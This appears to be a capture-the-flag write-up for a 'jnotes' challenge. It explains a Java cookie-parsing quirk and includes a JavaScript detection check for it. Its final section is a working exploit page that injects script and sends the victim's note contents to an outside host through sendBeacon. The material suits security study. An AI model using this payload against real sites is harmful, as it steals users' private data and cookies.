# tl;dr

* Java's cookie parsing mishandles quotes: when a cookie value begins with a `"`, everything up to the next `"` (including any cookies that follow) is taken as that cookie's value
* We can set a cookie with an empty name from JavaScript: `document.cookie="=value";`
* Use that to plant a cookie whose value starts with `note="`, which the server reads as a new `note` cookie: `document.cookie='=note="';`
* Make our cookie come first by setting its path to `//`, since Chrome sends cookies with longer paths first
* Now create an iframe whose src is `//` and read its innerHTML
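
An added example, not from the original writeup: a plain-JavaScript model of the two parsing behaviours the tl;dr contrasts. `parseStrict` splits the Cookie header on `;` only (RFC 6265 style), `parseQuoteAware` is a simplified model of the quote handling described above (an assumption about the behaviour, not Java's actual code), and `parsersDisagree` flags a header on which the two differ, which is the condition a server-side check would log. The sample header is constructed.

```javascript
// RFC 6265 style: split on ';', name before first '=', no quote handling.
function parseStrict(header) {
  const out = {};
  for (const part of header.split(";")) {
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    const name = part.slice(0, eq).trim();
    if (!(name in out)) out[name] = part.slice(eq + 1).trim(); // first wins
  }
  return out;
}

// Model of the quote handling the tl;dr describes (a simplification, not
// Java's real parser): a value starting with '"' runs until the next '"'.
function parseQuoteAware(header) {
  const out = {};
  let i = 0;
  while (i < header.length) {
    const eq = header.indexOf("=", i);
    if (eq < 0) break;
    const name = header.slice(i, eq).trim();
    let j = eq + 1;
    while (header[j] === " ") j++;
    let value, end;
    if (header[j] === '"') {
      const close = header.indexOf('"', j + 1);
      end = close < 0 ? header.length : close + 1;
      value = header.slice(j + 1, close < 0 ? end : close);
    } else {
      end = header.indexOf(";", j);
      if (end < 0) end = header.length;
      value = header.slice(j, end);
    }
    if (!(name in out)) out[name] = value.trim();
    const semi = header.indexOf(";", end);
    i = semi < 0 ? header.length : semi + 1;
  }
  return out;
}

// Detection check: true when a quoted value would swallow neighbouring cookies.
function parsersDisagree(header) {
  const a = parseStrict(header), b = parseQuoteAware(header);
  for (const k of new Set([...Object.keys(a), ...Object.keys(b)])) if (a[k] !== b[k]) return true;
  return false;
}

// Constructed sample: planted empty-name cookie first, then the victim's cookies.
const SAMPLE_HEADER = 'note="; note=my private note; theme="dark"';
```

On the sample header the strict parser keeps the planted `"` as `note` and the victim's `theme` separately, while the quote-aware model returns the victim's own `note` cookie inside the planted value, which is exactly the disagreement the check reports.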

## Final Payload

```html
<html>
<body>
<form method="POST" action="https://jnotes.mc.ax/create">
<input id="p" name="note" value="" >
</form>
<script>
document.querySelector("#p").value = `</textarea>
<\x73cript>
document.cookie='=note=";path=//';
const frame = document.createElement('iframe');
frame.src = "https://jnotes.mc.ax//";
document.body.appendChild(frame);
frame.onload = () => {
navigator.sendBeacon("https://your.domain.com",frame.contentWindow.document.body.innerHTML);
}
</\x73cript>`;
document.forms[0].submit();
</script>
</body>
</html>
```

Original writeup (https://r0h1t.me/blog/posts/jnotes/).